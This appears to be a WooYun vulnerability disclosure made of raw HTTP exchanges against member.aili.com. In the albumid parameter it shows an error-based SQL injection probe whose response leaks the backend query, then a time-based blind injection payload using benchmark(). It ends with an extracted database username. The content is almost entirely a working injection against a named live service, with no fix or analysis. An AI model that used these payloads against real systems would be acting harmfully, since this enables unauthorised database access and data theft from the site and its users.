WooYun.org

POST /?c=member&m=album&a=defaultalbum&uid=10478687 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) 
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://member.aili.com
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Host: member.aili.com
Content-Length: 24
Accept-Encoding: gzip, deflate
albumid=1618%20 '%23
HTTP/1.1 200 OK
Date: Wed, 04 Mar 2015 12:47:19 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 jsycdx98:7 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 2223
System Maintenance......<br>Please wait Try.Invalid SQL:  SELECT  *  FROM aili_member_photocate WHERE id = 1618  \'# AND userid=<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tra

POST /?c=member&m=album&a=defaultalbum&uid=10478687 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://member.aili.com
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Host: member.aili.com
Content-Length: 73
Accept-Encoding: gzip, deflate
albumid=1618%20and%20if(user()=0,benchmark(2000000%2csha1(1)),1)--%20

user()=nemp7cng1u*